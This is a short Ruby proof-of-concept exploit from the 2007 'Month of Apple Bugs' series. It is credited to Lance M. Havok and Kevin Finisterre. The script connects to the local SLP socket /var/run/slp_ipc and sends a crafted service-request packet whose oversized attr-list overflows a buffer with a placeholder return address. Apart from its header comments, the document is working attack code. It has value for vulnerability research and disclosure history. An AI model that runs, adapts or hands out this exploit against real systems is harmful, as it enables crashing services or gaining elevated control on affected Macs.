MOAB-17-01-2007.rb.txt
Posted on 20 January 2007
#!/usr/bin/ruby # (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # All pwnage reserved. # # Proof of concept for MOAB-17-01-2007 # http://projects.info-pull.com/moab/MOAB-17-01-2007.html # # Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' target_path = (ARGV[0] || '/var/run/slp_ipc') slp_socket = UNIXSocket.open(target_path) payload = ("x58" * 506) payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398) stream = "x01" + # SrvRqst = 1 "x00x13" + # Length of remaining fields? (up to attr-list) "x04x00x00x00x00x00x00" + "x00x02x00x00" + # length of scope-list string "x78x78" + # <scope-list> "xffx03x00x00" + # length of attr-list string 0x3ff = 1023 in hex. (payload) # <attr-list> slp_socket.write stream slp_socket.close